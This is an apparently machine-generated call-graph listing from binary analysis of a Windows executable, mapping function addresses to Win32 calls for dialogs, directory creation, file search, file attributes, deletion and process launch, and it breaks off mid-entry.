26335->26336 26336->25838 26338 7ff75aaa2085 26337->26338 26340 7ff75aaa2059 memcpy_s 26337->26340 27916 7ff75aaa15b8 33 API calls 3 library calls 26338->27916 26340->25811 26341->25861 26342->25928 26343->25953 26344->25968 26345->25980 26371 7ff75aab3e28 26346->26371 26349 7ff75aac0f68 WideCharToMultiByte 26350 7ff75aaba519 26349->26350 26351 7ff75aaba589 26350->26351 26365 7ff75aab9800 31 API calls 26350->26365 26368 7ff75aaba56a SetDlgItemTextW 26350->26368 26375 7ff75aab9408 26351->26375 26354 7ff75aaba6f2 GetSystemMetrics GetWindow 26358 7ff75aaba821 26354->26358 26369 7ff75aaba71d 26354->26369 26355 7ff75aaba603 26356 7ff75aaba6c2 26355->26356 26357 7ff75aaba60c GetWindowLongPtrW 26355->26357 26390 7ff75aab95a8 26356->26390 26360 7ff75ab0e2c0 26357->26360 26359 7ff75aad2320 _handle_error 8 API calls 26358->26359 26362 7ff75aaba830 26359->26362 26363 7ff75aaba6aa GetWindowRect 26360->26363 26362->25993 26363->26356 26365->26350 26366 7ff75aaba6e5 SetWindowTextW 26366->26354 26367 7ff75aaba73e GetWindowRect 26367->26369 26368->26350 26369->26358 26369->26367 26370 7ff75aaba800 GetWindow 26369->26370 26370->26358 26370->26369 26372 7ff75aab3e4d _snwprintf 26371->26372 26373 7ff75aad9ef0 swprintf 46 API calls 26372->26373 26374 7ff75aab3e69 26373->26374 26374->26349 26376 7ff75aab95a8 47 API calls 26375->26376 26378 7ff75aab944f 26376->26378 26377 7ff75aad2320 _handle_error 8 API calls 26379 7ff75aab958e GetWindowRect GetClientRect 26377->26379 26380 7ff75aaa129c 33 API calls 26378->26380 26388 7ff75aab955a 26378->26388 26379->26354 26379->26355 26381 7ff75aab949c 26380->26381 26382 7ff75aab95a1 26381->26382 26383 7ff75aaa129c 33 API calls 26381->26383 26384 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26382->26384 26386 7ff75aab9514 26383->26386 26385 7ff75aab95a7 26384->26385 26387 7ff75aab959c 26386->26387 26386->26388 26389 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26387->26389 26388->26377 26389->26382 26391 7ff75aab3e28 swprintf 46 API calls 26390->26391 26392 7ff75aab95eb 26391->26392 26393 7ff75aac0f68 WideCharToMultiByte 26392->26393 26394 7ff75aab9603 26393->26394 26395 7ff75aab9800 31 API calls 26394->26395 26396 7ff75aab961b 26395->26396 26397 7ff75aad2320 _handle_error 8 API calls 26396->26397 26398 7ff75aab962b 26397->26398 26398->26354 26398->26366 26411 7ff75aaa13a4 26399->26411 26402 7ff75aaa2494 26403 7ff75aaa129c 33 API calls 26402->26403 26404 7ff75aaa24a2 26403->26404 26406 7ff75aaa2505 26404->26406 26409 7ff75aaa24dd 26404->26409 26405 7ff75aad2320 _handle_error 8 API calls 26407 7ff75aaa24f3 26405->26407 26408 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26406->26408 26407->26002 26410 7ff75aaa250a 26408->26410 26409->26405 26412 7ff75aaa142d GetWindowTextW 26411->26412 26413 7ff75aaa13ad 26411->26413 26412->26402 26414 7ff75aaa13ce 26413->26414 26415 7ff75aaa143d 26413->26415 26418 7ff75aad21d0 33 API calls 26414->26418 26419 7ff75aaa13db __scrt_get_show_window_mode 26414->26419 26422 7ff75aaa2018 33 API calls std::_Xinvalid_argument 26415->26422 26418->26419 26421 7ff75aaa197c 31 API calls _invalid_parameter_noinfo_noreturn 26419->26421 26421->26412 26423->26013 26425->26027 26427 7ff75aacae80 GetDlgItem 26426->26427 26428 7ff75aacae3c GetMessageW 26426->26428 26427->26038 26427->26039 26429 7ff75aacae5b IsDialogMessageW 26428->26429 26430 7ff75aacae6a TranslateMessage DispatchMessageW 26428->26430 26429->26427 26429->26430 26430->26427 26433 7ff75aab36b3 26431->26433 26432 7ff75aab36e0 26451 7ff75aab32bc 26432->26451 26433->26432 26435 7ff75aab36cc CreateDirectoryW 26433->26435 26435->26432 26437 7ff75aab377d 26435->26437 26439 7ff75aab378d 26437->26439 26465 7ff75aab3d34 26437->26465 26438 7ff75aab3791 GetLastError 26438->26439 26442 7ff75aad2320 _handle_error 8 API calls 26439->26442 26444 7ff75aab37b9 26442->26444 26444->26057 26445 7ff75aab3720 CreateDirectoryW 26446 7ff75aab373b 26445->26446 26447 7ff75aab3774 26446->26447 26448 7ff75aab37ce 26446->26448 26447->26437 26447->26438 26449 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26448->26449 26450 7ff75aab37d3 26449->26450 26452 7ff75aab32e4 26451->26452 26453 7ff75aab32e7 GetFileAttributesW 26451->26453 26452->26453 26454 7ff75aab3375 26453->26454 26455 7ff75aab32f8 26453->26455 26457 7ff75aad2320 _handle_error 8 API calls 26454->26457 26456 7ff75aab6a0c 49 API calls 26455->26456 26459 7ff75aab331f 26456->26459 26458 7ff75aab3389 26457->26458 26458->26438 26479 7ff75aab6a0c 26458->26479 26460 7ff75aab3323 GetFileAttributesW 26459->26460 26461 7ff75aab333c 26459->26461 26460->26461 26461->26454 26462 7ff75aab3399 26461->26462 26463 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26462->26463 26464 7ff75aab339e 26463->26464 26466 7ff75aab3d5e SetFileAttributesW 26465->26466 26467 7ff75aab3d5b 26465->26467 26468 7ff75aab3d74 26466->26468 26475 7ff75aab3df5 26466->26475 26467->26466 26470 7ff75aab6a0c 49 API calls 26468->26470 26469 7ff75aad2320 _handle_error 8 API calls 26471 7ff75aab3e0a 26469->26471 26472 7ff75aab3d99 26470->26472 26471->26439 26473 7ff75aab3d9d SetFileAttributesW 26472->26473 26474 7ff75aab3dbc 26472->26474 26473->26474 26474->26475 26476 7ff75aab3e1a 26474->26476 26475->26469 26477 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26476->26477 26478 7ff75aab3e1f 26477->26478 26480 7ff75aab6a4b 26479->26480 26498 7ff75aab6a44 26479->26498 26482 7ff75aaa129c 33 API calls 26480->26482 26481 7ff75aad2320 _handle_error 8 API calls 26483 7ff75aab371c 26481->26483 26484 7ff75aab6a76 26482->26484 26483->26445 26483->26446 26485 7ff75aab6a96 26484->26485 26486 7ff75aab6cc7 26484->26486 26488 7ff75aab6ab0 26485->26488 26510 7ff75aab6b49 26485->26510 26487 7ff75aab62dc 35 API calls 26486->26487 26490 7ff75aab6ce6 26487->26490 26489 7ff75aab70ab 26488->26489 26552 7ff75aaac098 33 API calls 2 library calls 26488->26552 26572 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26489->26572 26491 7ff75aab6eef 26490->26491 26495 7ff75aab6d1b 26490->26495 26549 7ff75aab6b44 26490->26549 26494 7ff75aab70cf 26491->26494 26569 7ff75aaac098 33 API calls 2 library calls 26491->26569 26575 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26494->26575 26501 7ff75aab70bd 26495->26501 26555 7ff75aaac098 33 API calls 2 library calls 26495->26555 26496 7ff75aab70b1 26503 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26496->26503 26498->26481 26499 7ff75aab6b03 26512 7ff75aaa1fa0 31 API calls 26499->26512 26518 7ff75aab6b15 memcpy_s 26499->26518 26573 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26501->26573 26502 7ff75aab70d5 26504 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26502->26504 26509 7ff75aab70b7 26503->26509 26511 7ff75aab70db 26504->26511 26505 7ff75aab70a6 26516 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26505->26516 26506 7ff75aab6f56 26570 7ff75aaa11cc 33 API calls memcpy_s 26506->26570 26520 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26509->26520 26517 7ff75aaa129c 33 API calls 26510->26517 26510->26549 26522 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26511->26522 26512->26518 26514 7ff75aab70c3 26525 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26514->26525 26515 7ff75aaa1fa0 31 API calls 26515->26549 26516->26489 26523 7ff75aab6bbe 26517->26523 26518->26515 26519 7ff75aab6f69 26571 7ff75aab57ac 33 API calls memcpy_s 26519->26571 26520->26501 26521 7ff75aaa1fa0 31 API calls 26535 7ff75aab6df5 26521->26535 26526 7ff75aab70e1 26522->26526 26553 7ff75aab5820 33 API calls 26523->26553 26528 7ff75aab70c9 26525->26528 26574 7ff75aaa704c 47 API calls memcpy_s 26528->26574 26529 7ff75aab6bd3 26554 7ff75aaae164 33 API calls 2 library calls 26529->26554 26530 7ff75aab6d76 memcpy_s 26530->26514 26530->26521 26531 7ff75aaa1fa0 31 API calls 26534 7ff75aab6fec 26531->26534 26536 7ff75aaa1fa0 31 API calls 26534->26536 26540 7ff75aab6e21 26535->26540 26556 7ff75aaa1744 26535->26556 26539 7ff75aab6ff6 26536->26539 26537 7ff75aab6f79 memcpy_s 26537->26511 26537->26531 26538 7ff75aaa1fa0 31 API calls 26542 7ff75aab6c6d 26538->26542 26543 7ff75aaa1fa0 31 API calls 26539->26543 26540->26528 26544 7ff75aaa129c 33 API calls 26540->26544 26545 7ff75aaa1fa0 31 API calls 26542->26545 26543->26549 26546 7ff75aab6ec2 26544->26546 26545->26549 26548 7ff75aaa2034 33 API calls 26546->26548 26547 7ff75aab6be9 memcpy_s 26547->26509 26547->26538 26550 7ff75aab6edf 26548->26550 26549->26496 26549->26498 26549->26502 26549->26505 26551 7ff75aaa1fa0 31 API calls 26550->26551 26551->26549 26552->26499 26553->26529 26554->26547 26555->26530 26557 7ff75aaa18a1 26556->26557 26560 7ff75aaa1784 26556->26560 26576 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26557->26576 26559 7ff75aaa18a7 26577 7ff75aaa1f80 33 API calls 3 library calls 26559->26577 26560->26559 26564 7ff75aad21d0 33 API calls 26560->26564 26567 7ff75aaa17ac memcpy_s 26560->26567 26562 7ff75aaa18ad 26578 7ff75aad354c 31 API calls __std_exception_copy 26562->26578 26564->26567 26565 7ff75aaa18d9 26565->26540 26566 7ff75aaa1859 memcpy_s 26566->26540 26567->26566 26568 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26567->26568 26568->26557 26569->26506 26570->26519 26571->26537 26574->26494 26577->26562 26578->26565 26580 7ff75aaa7206 26579->26580 26581 7ff75aaa713b 26579->26581 26589 7ff75aaa704c 47 API calls memcpy_s 26580->26589 26587 7ff75aaa714b memcpy_s 26581->26587 26588 7ff75aaa3f48 33 API calls 2 library calls 26581->26588 26584 7ff75aaa7273 26584->26073 26585 7ff75aaa720b 26585->26584 26590 7ff75aaa889c 8 API calls memcpy_s 26585->26590 26587->26073 26588->26587 26589->26585 26590->26585 26592 7ff75aab20ea 26591->26592 26593 7ff75aab2102 26591->26593 26592->26593 26595 7ff75aab20f6 CloseHandle 26592->26595 26594 7ff75aab2126 26593->26594 26597 7ff75aaab544 99 API calls 26593->26597 26594->26091 26595->26593 26597->26594 26599 7ff75aacaa2f 26598->26599 26600 7ff75aacaa36 26598->26600 26599->26195 26600->26599 26601 7ff75aaa1744 33 API calls 26600->26601 26601->26600 26602->26195 26604 7ff75aaca47f 26603->26604 26625 7ff75aaca706 26603->26625 26737 7ff75aaccdf8 33 API calls 26604->26737 26606 7ff75aad2320 _handle_error 8 API calls 26608 7ff75aaca717 26606->26608 26607 7ff75aaca49e 26609 7ff75aaa129c 33 API calls 26607->26609 26608->26177 26610 7ff75aaca4de 26609->26610 26611 7ff75aaa129c 33 API calls 26610->26611 26612 7ff75aaca517 26611->26612 26613 7ff75aaa129c 33 API calls 26612->26613 26614 7ff75aaca54a 26613->26614 26738 7ff75aaca834 33 API calls _invalid_parameter_noinfo_noreturn 26614->26738 26616 7ff75aaca734 26618 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26616->26618 26617 7ff75aaca573 26617->26616 26619 7ff75aaca73a 26617->26619 26621 7ff75aaca740 26617->26621 26623 7ff75aaa20b0 33 API calls 26617->26623 26626 7ff75aaca685 26617->26626 26618->26619 26620 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26619->26620 26620->26621 26622 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26621->26622 26624 7ff75aaca746 26622->26624 26623->26626 26628 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26624->26628 26625->26606 26626->26624 26626->26625 26627 7ff75aaca72f 26626->26627 26630 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26627->26630 26629 7ff75aaca74c 26628->26629 26631 7ff75aaa255c 61 API calls 26629->26631 26630->26616 26632 7ff75aaca795 26631->26632 26633 7ff75aaca7b1 26632->26633 26634 7ff75aaca801 SetDlgItemTextW 26632->26634 26638 7ff75aaca7a1 26632->26638 26635 7ff75aad2320 _handle_error 8 API calls 26633->26635 26634->26633 26636 7ff75aaca827 26635->26636 26636->26177 26637 7ff75aaca7ad 26637->26633 26639 7ff75aaca7b7 EndDialog 26637->26639 26638->26633 26638->26637 26739 7ff75aabbb00 102 API calls 26638->26739 26639->26633 26648 7ff75aacf529 __scrt_get_show_window_mode 26641->26648 26659 7ff75aacf87d 26641->26659 26642 7ff75aaa1fa0 31 API calls 26643 7ff75aacf89c 26642->26643 26644 7ff75aad2320 _handle_error 8 API calls 26643->26644 26645 7ff75aacf8a8 26644->26645 26645->26181 26646 7ff75aacf684 26649 7ff75aaa129c 33 API calls 26646->26649 26648->26646 26740 7ff75aac13c4 CompareStringW 26648->26740 26650 7ff75aacf6c0 26649->26650 26651 7ff75aab32a8 51 API calls 26650->26651 26652 7ff75aacf6ca 26651->26652 26653 7ff75aaa1fa0 31 API calls 26652->26653 26656 7ff75aacf6d5 26653->26656 26654 7ff75aacf742 ShellExecuteExW 26655 7ff75aacf846 26654->26655 26661 7ff75aacf755 26654->26661 26655->26659 26663 7ff75aacf8fb 26655->26663 26656->26654 26658 7ff75aaa129c 33 API calls 26656->26658 26657 7ff75aacf78e 26742 7ff75aacfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26657->26742 26662 7ff75aacf717 26658->26662 26659->26642 26660 7ff75aacf7e3 CloseHandle 26666 7ff75aacf801 26660->26666 26667 7ff75aacf7f2 26660->26667 26661->26657 26661->26660 26668 7ff75aacf781 ShowWindow 26661->26668 26741 7ff75aab5b60 53 API calls 2 library calls 26662->26741 26665 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26663->26665 26671 7ff75aacf900 26665->26671 26666->26655 26674 7ff75aacf837 ShowWindow 26666->26674 26743 7ff75aac13c4 CompareStringW 26667->26743 26668->26657 26670 7ff75aacf725 26673 7ff75aaa1fa0 31 API calls 26670->26673 26676 7ff75aacf72f 26673->26676 26674->26655 26675 7ff75aacf7a6 26675->26660 26677 7ff75aacf7b4 GetExitCodeProcess 26675->26677 26676->26654 26677->26660 26678 7ff75aacf7c7 26677->26678 26678->26660 26679->26195 26680->26195 26681->26195 26682->26195 26683->26195 26684->26195 26685->26195 26686->26195 26687->26195 26688->26195 26690 7ff75aab72ea 26689->26690 26744 7ff75aaab3a8 26690->26744 26694 7ff75aab31e4 26693->26694 26695 7ff75aab31e7 DeleteFileW 26693->26695 26694->26695 26696 7ff75aab31fd 26695->26696 26703 7ff75aab327c 26695->26703 26698 7ff75aab6a0c 49 API calls 26696->26698 26697 7ff75aad2320 _handle_error 8 API calls 26699 7ff75aab3291 26697->26699 26700 7ff75aab3222 26698->26700 26699->26195 26701 7ff75aab3226 DeleteFileW 26700->26701 26702 7ff75aab3243 26700->26702 26701->26702 26702->26703 26704 7ff75aab32a1 26702->26704 26703->26697 26705 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26704->26705 26706 7ff75aab32a6 26705->26706 26708->26195 26709->26195 26710->26195 26711->26195 26713 7ff75aab7e0c 26712->26713 26714 7ff75aab7e55 26713->26714 26715 7ff75aab7e23 26713->26715 26748 7ff75aaa704c 47 API calls memcpy_s 26714->26748 26717 7ff75aaa129c 33 API calls 26715->26717 26719 7ff75aab7e47 26717->26719 26718 7ff75aab7e5a 26719->26195 26720->26195 26721->26195 26724 7ff75aabd25e 26722->26724 26723 7ff75aabd292 26723->26234 26724->26723 26725 7ff75aaa1744 33 API calls 26724->26725 26725->26724 26726->26132 26727->26122 26729->26102 26730->26106 26731->26110 26732->26161 26733->26150 26735->26151 26737->26607 26738->26617 26739->26637 26740->26646 26741->26670 26742->26675 26743->26666 26747 7ff75aaab3f2 __scrt_get_show_window_mode 26744->26747 26745 7ff75aad2320 _handle_error 8 API calls 26746 7ff75aaab4b6 26745->26746 26746->26195 26747->26745 26748->26718 26805 7ff75aab86ec 26749->26805 26751 7ff75aaae3c4 26815 7ff75aaae600 26751->26815 26753 7ff75aaae4d4 26754 7ff75aad21d0 33 API calls 26753->26754 26757 7ff75aaae4f0 26754->26757 26755 7ff75aaae549 26758 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26755->26758 26756 7ff75aaae454 26756->26753 26756->26755 26821 7ff75aac3148 102 API calls 26757->26821 26766 7ff75aaae54e 26758->26766 26760 7ff75aaae51d 26761 7ff75aad2320 _handle_error 8 API calls 26760->26761 26763 7ff75aaae52d 26761->26763 26762 7ff75aab18c2 26765 7ff75aab190d 26762->26765 26767 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26762->26767 26763->26251 26764 7ff75aaa1fa0 31 API calls 26764->26766 26765->26251 26766->26762 26766->26764 26766->26765 26768 7ff75aab193b 26767->26768 26770 7ff75aaae7ea 26769->26770 26771 7ff75aaae864 26770->26771 26774 7ff75aaae8a1 26770->26774 26837 7ff75aab3ec8 26770->26837 26771->26774 26775 7ff75aaae993 26771->26775 26773 7ff75aaae900 26781 7ff75aaae955 26773->26781 26880 7ff75aaa28a4 82 API calls 2 library calls 26773->26880 26774->26773 26844 7ff75aaaf578 26774->26844 26776 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26775->26776 26779 7ff75aaae998 26776->26779 26778 7ff75aad2320 _handle_error 8 API calls 26780 7ff75aaae97e 26778->26780 26783 7ff75aaae578 26780->26783 26781->26778 27885 7ff75aab15d8 26783->27885 26786 7ff75aaae59e 26788 7ff75aaa1fa0 31 API calls 26786->26788 26787 7ff75aac1870 108 API calls 26787->26786 26789 7ff75aaae5b7 26788->26789 26790 7ff75aaa1fa0 31 API calls 26789->26790 26791 7ff75aaae5c3 26790->26791 26792 7ff75aaa1fa0 31 API calls 26791->26792 26793 7ff75aaae5cf 26792->26793 26794 7ff75aab878c 108 API calls 26793->26794 26795 7ff75aaae5db 26794->26795 26796 7ff75aaa1fa0 31 API calls 26795->26796 26797 7ff75aaae5e4 26796->26797 26798 7ff75aaa1fa0 31 API calls 26797->26798 26802 7ff75aaae5ed 26798->26802 26799 7ff75aab18c2 26801 7ff75aab190d 26799->26801 26803 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26799->26803 26800 7ff75aaa1fa0 31 API calls 26800->26802 26801->26255 26802->26799 26802->26800 26802->26801 26804 7ff75aab193b 26803->26804 26806 7ff75aab870a 26805->26806 26807 7ff75aad21d0 33 API calls 26806->26807 26808 7ff75aab872f 26807->26808 26809 7ff75aab8743 26808->26809 26822 7ff75aaa9f1c 26808->26822 26811 7ff75aad21d0 33 API calls 26809->26811 26812 7ff75aab8759 26811->26812 26813 7ff75aab876b 26812->26813 26814 7ff75aaa9f1c 33 API calls 26812->26814 26813->26751 26814->26813 26816 7ff75aaae627 26815->26816 26818 7ff75aaae62c memcpy_s 26815->26818 26817 7ff75aaa1fa0 31 API calls 26816->26817 26817->26818 26819 7ff75aaa1fa0 31 API calls 26818->26819 26820 7ff75aaae668 memcpy_s 26818->26820 26819->26820 26820->26756 26821->26760 26827 7ff75aad24a0 26822->26827 26825 7ff75aad24a0 33 API calls 26826 7ff75aaa9f75 __scrt_get_show_window_mode 26825->26826 26826->26809 26828 7ff75aad24d1 26827->26828 26829 7ff75aaa9f4a 26828->26829 26831 7ff75aaa9fb0 26828->26831 26829->26825 26834 7ff75aabb788 26831->26834 26833 7ff75aaa9fc2 26833->26828 26835 7ff75aaa13a4 33 API calls 26834->26835 26836 7ff75aabb7ad 26835->26836 26836->26833 26838 7ff75aab72cc 8 API calls 26837->26838 26839 7ff75aab3ee1 26838->26839 26840 7ff75aab3f0f 26839->26840 26881 7ff75aab40bc 26839->26881 26840->26770 26843 7ff75aab3efa FindClose 26843->26840 26845 7ff75aaaf598 _snwprintf 26844->26845 26920 7ff75aaa2950 26845->26920 26848 7ff75aaaf5cc 26852 7ff75aaaf5fc 26848->26852 26937 7ff75aaa33e4 26848->26937 26851 7ff75aaaf5f8 26851->26852 26969 7ff75aaa3ad8 26851->26969 27172 7ff75aaa2c54 26852->27172 26860 7ff75aaa8d04 33 API calls 26861 7ff75aaaf662 26860->26861 27192 7ff75aab7918 48 API calls 2 library calls 26861->27192 26863 7ff75aaaf677 26865 7ff75aab3ec8 55 API calls 26863->26865 26868 7ff75aaaf6ad 26865->26868 26871 7ff75aaaf74d 26868->26871 26876 7ff75aab3ec8 55 API calls 26868->26876 26879 7ff75aaaf89a 26868->26879 27193 7ff75aab7918 48 API calls 2 library calls 26868->27193 26874 7ff75aaaf895 26871->26874 26875 7ff75aaaf7cb 26871->26875 26871->26879 26872 7ff75aaaf842 26872->26852 26984 7ff75aaa69f8 26872->26984 26995 7ff75aaaf930 26872->26995 26873 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26878 7ff75aaaf8a0 26873->26878 26877 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26874->26877 26979 7ff75aaaf8a4 26875->26979 26876->26868 26877->26879 26879->26873 26880->26781 26882 7ff75aab41d2 FindNextFileW 26881->26882 26883 7ff75aab40f9 FindFirstFileW 26881->26883 26885 7ff75aab41e1 GetLastError 26882->26885 26886 7ff75aab41f3 26882->26886 26883->26886 26887 7ff75aab411e 26883->26887 26905 7ff75aab41c0 26885->26905 26888 7ff75aab4211 26886->26888 26891 7ff75aaa20b0 33 API calls 26886->26891 26889 7ff75aab6a0c 49 API calls 26887->26889 26896 7ff75aaa129c 33 API calls 26888->26896 26890 7ff75aab4144 26889->26890 26893 7ff75aab4167 26890->26893 26894 7ff75aab4148 FindFirstFileW 26890->26894 26891->26888 26892 7ff75aad2320 _handle_error 8 API calls 26895 7ff75aab3ef4 26892->26895 26893->26886 26898 7ff75aab41af GetLastError 26893->26898 26900 7ff75aab4314 26893->26900 26894->26893 26895->26840 26895->26843 26897 7ff75aab423b 26896->26897 26907 7ff75aab8090 26897->26907 26898->26905 26902 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26900->26902 26903 7ff75aab431a 26902->26903 26904 7ff75aab430f 26906 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26904->26906 26905->26892 26906->26900 26908 7ff75aab80a5 26907->26908 26911 7ff75aab8188 26908->26911 26910 7ff75aab4249 26910->26904 26910->26905 26912 7ff75aab8326 26911->26912 26913 7ff75aab81ba 26911->26913 26919 7ff75aaa704c 47 API calls memcpy_s 26912->26919 26917 7ff75aab81d4 memcpy_s 26913->26917 26918 7ff75aab58a4 33 API calls 2 library calls 26913->26918 26915 7ff75aab832b 26917->26910 26918->26917 26919->26915 26921 7ff75aaa296c 26920->26921 26922 7ff75aaa9f1c 33 API calls 26921->26922 26923 7ff75aaa2980 26922->26923 26924 7ff75aab86ec 33 API calls 26923->26924 26925 7ff75aaa298d 26924->26925 26926 7ff75aad21d0 33 API calls 26925->26926 26929 7ff75aaa2ac2 26925->26929 26927 7ff75aaa2ab0 26926->26927 26927->26929 27195 7ff75aaa91c8 26927->27195 27202 7ff75aab4d04 26929->27202 26932 7ff75aab2ca8 27231 7ff75aab24c0 26932->27231 26933 7ff75aab2cc5 26933->26848 27250 7ff75aab28d0 26937->27250 26938 7ff75aaa3674 27269 7ff75aaa28a4 82 API calls 2 library calls 26938->27269 26939 7ff75aaa3431 __scrt_get_show_window_mode 26941 7ff75aaa3601 26939->26941 26948 7ff75aaa344e 26939->26948 27255 7ff75aab2bb0 26939->27255 26941->26851 26942 7ff75aaa69f8 141 API calls 26943 7ff75aaa3682 26942->26943 26943->26941 26943->26942 26945 7ff75aaa370c 26943->26945 26960 7ff75aab2aa0 101 API calls 26943->26960 26945->26941 26950 7ff75aaa3740 26945->26950 27270 7ff75aaa28a4 82 API calls 2 library calls 26945->27270 26947 7ff75aaa35cb 26947->26948 26949 7ff75aaa35d7 26947->26949 26948->26938 26948->26943 26949->26941 26952 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26949->26952 26950->26941 26951 7ff75aaa384d 26950->26951 26962 7ff75aab2bb0 101 API calls 26950->26962 26951->26941 26953 7ff75aaa20b0 33 API calls 26951->26953 26954 7ff75aaa3891 26952->26954 26953->26941 26954->26851 26955 7ff75aaa34eb 26955->26947 27264 7ff75aab2aa0 26955->27264 26957 7ff75aaa69f8 141 API calls 26958 7ff75aaa378e 26957->26958 26958->26957 26959 7ff75aaa3803 26958->26959 26963 7ff75aab2aa0 101 API calls 26958->26963 26967 7ff75aab2aa0 101 API calls 26959->26967 26960->26943 26961 7ff75aab28d0 104 API calls 26961->26947 26962->26958 26963->26958 26967->26951 26968 7ff75aab28d0 104 API calls 26968->26955 26970 7ff75aaa3af9 26969->26970 26976 7ff75aaa3b55 26969->26976 27282 7ff75aaa3378 26970->27282 26971 7ff75aad2320 _handle_error 8 API calls 26973 7ff75aaa3b67 26971->26973 26973->26860 26973->26875 26975 7ff75aaa3b6c 26977 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26975->26977 26976->26971 26978 7ff75aaa3b71 26977->26978 27510 7ff75aab886c 26979->27510 26981 7ff75aaaf8ba 27514 7ff75aabef60 GetSystemTime SystemTimeToFileTime 26981->27514 26985 7ff75aaa6a0e 26984->26985 26989 7ff75aaa6a0a 26984->26989 26994 7ff75aab2bb0 101 API calls 26985->26994 26986 7ff75aaa6a1b 26987 7ff75aaa6a2f 26986->26987 26988 7ff75aaa6a3e 26986->26988 26987->26989 27523 7ff75aaa5e24 26987->27523 27606 7ff75aaa5130 130 API calls 2 library calls 26988->27606 26989->26872 26992 7ff75aaa6a3c 26992->26989 27607 7ff75aaa466c 82 API calls 26992->27607 26994->26986 26996 7ff75aaaf978 26995->26996 27001 7ff75aaaf9b0 26996->27001 27008 7ff75aaafa34 26996->27008 27728 7ff75aac612c 146 API calls 3 library calls 26996->27728 26997 7ff75aab1189 26999 7ff75aab11e1 26997->26999 27000 7ff75aab118e 26997->27000 26999->27008 27777 7ff75aac612c 146 API calls 3 library calls 26999->27777 27000->27008 27776 7ff75aaadd08 179 API calls 27000->27776 27001->26997 27005 7ff75aaaf9d0 27001->27005 27001->27008 27002 7ff75aad2320 _handle_error 8 API calls 27003 7ff75aab11c4 27002->27003 27003->26872 27005->27008 27643 7ff75aaa9bb0 27005->27643 27008->27002 27009 7ff75aaafad6 27656 7ff75aab5ef8 27009->27656 27013 7ff75aaafb7a 27173 7ff75aaa2c74 27172->27173 27176 7ff75aaa2c88 27172->27176 27173->27176 27864 7ff75aaa2d80 108 API calls _invalid_parameter_noinfo_noreturn 27173->27864 27174 7ff75aaa1fa0 31 API calls 27179 7ff75aaa2ca1 27174->27179 27176->27174 27178 7ff75aaa2d64 27181 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27178->27181 27179->27178 27865 7ff75aaa3090 31 API calls _invalid_parameter_noinfo_noreturn 27179->27865 27180 7ff75aaa2d08 27866 7ff75aaa3090 31 API calls _invalid_parameter_noinfo_noreturn 27180->27866 27183 7ff75aaa2d7c 27181->27183 27184 7ff75aaa2d14 27185 7ff75aaa1fa0 31 API calls 27184->27185 27186 7ff75aaa2d20 27185->27186 27867 7ff75aab878c 27186->27867 27192->26863 27193->26868 27194 7ff75aac0994 83 API calls _handle_error 27194->26872 27212 7ff75aab56a4 27195->27212 27197 7ff75aaa91df 27198 7ff75aabb788 33 API calls 27197->27198 27199 7ff75aaa9365 27198->27199 27215 7ff75aaa9a28 27199->27215 27201 7ff75aaa9383 27201->26929 27203 7ff75aab4d32 __scrt_get_show_window_mode 27202->27203 27227 7ff75aab4bac 27203->27227 27205 7ff75aab4d54 27206 7ff75aab4d90 27205->27206 27208 7ff75aab4dae 27205->27208 27207 7ff75aad2320 _handle_error 8 API calls 27206->27207 27209 7ff75aaa2b32 27207->27209 27210 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27208->27210 27209->26848 27209->26932 27211 7ff75aab4db3 27210->27211 27218 7ff75aab56e8 27212->27218 27216 7ff75aab56e8 2 API calls 27215->27216 27217 7ff75aaa9a36 27216->27217 27217->27201 27219 7ff75aab56fe __scrt_get_show_window_mode 27218->27219 27222 7ff75aabeba4 27219->27222 27225 7ff75aabeb58 GetCurrentProcess GetProcessAffinityMask 27222->27225 27226 7ff75aab56de 27225->27226 27226->27197 27228 7ff75aab4c27 27227->27228 27230 7ff75aab4c2f memcpy_s 27227->27230 27229 7ff75aaa1fa0 31 API calls 27228->27229 27229->27230 27230->27205 27232 7ff75aab24fd CreateFileW 27231->27232 27234 7ff75aab25ae GetLastError 27232->27234 27241 7ff75aab266e 27232->27241 27235 7ff75aab6a0c 49 API calls 27234->27235 27236 7ff75aab25dc 27235->27236 27237 7ff75aab25e0 CreateFileW GetLastError 27236->27237 27242 7ff75aab262c 27236->27242 27237->27242 27238 7ff75aab26b1 SetFileTime 27244 7ff75aab26cf 27238->27244 27239 